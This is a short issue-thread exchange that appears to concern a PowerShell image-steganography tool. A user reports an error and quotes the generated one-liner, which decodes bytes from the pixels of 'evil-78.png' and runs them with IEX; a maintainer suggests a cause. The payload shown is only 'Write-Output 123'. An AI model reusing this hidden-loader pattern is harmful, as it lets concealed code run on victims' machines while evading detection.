peewpw
commented
6 years ago Guessing that something was wrong with your payload file... the GetString() function should be [0..15] if "Write-Output 123" were the input file. Let me know if you can reproduce.
After trying to execute the command, that was generated by the script, i get the: ` Exception calling "GetPixel" with "2" argument(s): "Parameter is not valid." At line:1 char:180 sal a New-Object;Add-Type -AssemblyName "System.Drawing";$g= a System.Drawing.Bitmap("($pwd).path\evil-78.png");$o= a Byte[] 1920;(0..0)|% {foreach($x in (0..1919)){$p=$g.GetPixel <<<< ($x,$);$o[$1920+$x]=([math]::Floor(($p.B -band 1 5)16) -bor ($p.G -band 15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..8]));
The command is:
sal a New-Object;Add-Type -AssemblyName "System.Drawing";$g= a System.Drawing.Bitmap(("$pwd).path\evil-78.png");$o= a Byte[] 1920;(0..0)|% {foreach($x in (0..1919)){$p=$g.GetPixel($x,$_);$o[$_*1920+$x]=([math]::Floor(($p.B -band 15)*16) -bor ($p.G -band 15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..8]))The payload is
Write-Output 123